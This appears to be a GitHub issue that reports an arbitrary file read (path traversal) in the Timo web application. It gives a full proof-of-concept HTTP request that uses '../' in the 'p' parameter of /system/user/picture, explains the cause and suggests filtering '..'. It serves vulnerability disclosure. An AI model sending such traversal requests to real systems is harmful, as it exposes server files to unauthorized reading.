There is a arbitrary file read vulnerability in Timo. #7
Description
[Vulnerability type]
arbitrary file read
[proof]
First we create a file flag.txt in D:\apache-tomcat-9.0.79\webapps\ROOT\flag.txt. The content of the file is "flag{this_is_flag}".
Then we send the http package:
GET /system/user/picture?p=/../flag.txt HTTP/1.1
Host: localhost:8080
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/system/menu/edit/6
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1701849099,1701995116; JSESSIONID=dd7cb592-38d0-415e-93e8-e79fb3b2de25
Connection: close
Response:
[Causes of Vulnerability]
If we pass the parameter p, it will use p as a part of image path. So we can pass ../../...... to read arbitrary file in the system.
[Fix suggesion]
Add filter to forbidden ".."